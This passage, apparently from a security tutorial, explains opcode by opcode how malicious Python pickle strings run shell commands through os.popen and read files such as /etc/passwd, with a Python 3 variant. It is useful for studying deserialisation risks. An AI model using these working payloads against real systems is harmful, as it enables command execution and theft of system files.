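Only plain function calls appear: getattr fetches the method from the class, and apply supplies the instance as its first argument.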

Converted into Pickle, this becomes:

cos popen (S'ls -al' tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

That's quite a mouthful; here's the breakdown:

  1. 'c' -> find the callable "os.popen", push it onto the stack [SB] [os.popen]
  2. '(' -> push a MARK onto the stack [SB] [os.popen] [MARK]
  3. "S'ls -al'" -> push 'ls -al' onto the stack [SB] [os.popen] [MARK] ['ls -al']
  4. 't' -> pop 'ls -al' and MARK, push ('ls -al') [SB] [os.popen] [('ls -al')]
  5. 'R' -> pop "os.popen" and "('ls -al')", call os.popen('ls -al'), push the opened file object onto the stack [SB] [<open file>]
  6. 'p0' -> store "<open file>" in register 0 [SB] [<open file>]
  7. '0' -> pop and discard topmost stack item [SB]
  8. 'c' -> find the callable '__builtin__.getattr', push it onto the stack [SB] [__builtin__.getattr]
  9. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  10. 'c' -> find the callable '__builtin__.file', push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. "S'read'" -> push 'read' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. 't' -> pop 'read', "__builtin__.file" and MARK, push (__builtin__.file, 'read') [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. 'R' -> pop "__builtin__.getattr" and "(__builtin__.file, 'read')", call __builtin__.getattr(__builtin__.file, 'read'), push the returned object onto the stack [SB] [<method object for 'file.read'>]
  14. 'p1' -> store "<method object for 'file.read'>" in register 1 [SB] [<method object for 'file.read'>]
  15. '0' -> pop and discard topmost stack item [SB]
  16. 'c' -> find the callable '__builtin__.apply', push it onto the stack [SB] [__builtin__.apply]
  17. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  18. 'g1' -> retrieve contents of register 1, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. 'g0' -> retrieve contents of register 0, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. 'l' -> pop "<open file>" and MARK, push the list "[<open file>]" [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. 't' -> pop "<method object for 'file.read'>", "[<open file>]" and MARK, push the tuple "(<method object for 'file.read'>,[<open file>])" [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. 'R' -> pop "__builtin__.apply" and "(<method object for 'file.read'>,[<open file>])", call __builtin__.apply(<method object for 'file.read'>,[<open file>]), push the returned object onto the stack [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. '.' -> pop the result off the stack and terminate [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
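The breakdown above can be cross-checked without executing anything. This sketch uses the standard pickletools module to parse the instruction stream, with the newlines that protocol 0 requires restored, and lists one opcode per step. Because the payload is only parsed and nothing is imported or called, it also works on Python 3, where "file" and "apply" no longer exist.

```python
import pickletools

payload = (
    b"cos\npopen\n(S'ls -al'\ntRp0\n0"
    b"c__builtin__\ngetattr\n(c__builtin__\nfile\nS\"read\"\ntRp1\n0"
    b"c__builtin__\napply\n(g1\n(g0\nltR."
)

# genops only parses the byte stream; it never runs the payload.
ops = [(op.name, arg) for op, arg, pos in pickletools.genops(payload)]
for number, (name, arg) in enumerate(ops, start=1):
    print(number, name, arg)
```

The opcode names map onto the single-character instructions: GLOBAL is 'c', PUT and GET are 'p' and 'g', POP is '0', REDUCE is 'R' and STOP is '.'.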
This is really useful, since we can now return command output in any Python version that supports Pickle.

That's enough Pickle for today. I'll leave you with a final modification of the above pickle string that reads and returns the contents of files:

c__builtin__ file (S"/etc/passwd" tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.
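For readers on Python 3, where "file" and "apply" are gone, a variant of the same idea can be sketched as follows. This is an adaptation rather than the payload above: it assumes the Python 3 names "builtins.open" and "builtins.getattr", fetches the bound "read" method from the instance, and calls it with an empty argument tuple. It reads a throwaway temporary file instead of /etc/passwd and assumes a POSIX-style path with no quotes or backslashes in it.

```python
import os
import pickle
import tempfile

# Create a harmless file to read back.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
    handle.write("secret\n")
    path = handle.name

# open(path) -> register 0; getattr(<file>, 'read') -> bound method;
# '(tR' then calls that method with an empty argument tuple.
payload = (
    b"cbuiltins\nopen\n(S'" + path.encode("ascii") + b"'\ntRp0\n0"
    b"cbuiltins\ngetattr\n(g0\nS'read'\ntR(tR."
)

contents = pickle.loads(payload)
os.remove(path)
print(repr(contents))
```

The unpickled "object" is simply the file's contents, which is what makes deserialising untrusted pickles so dangerous.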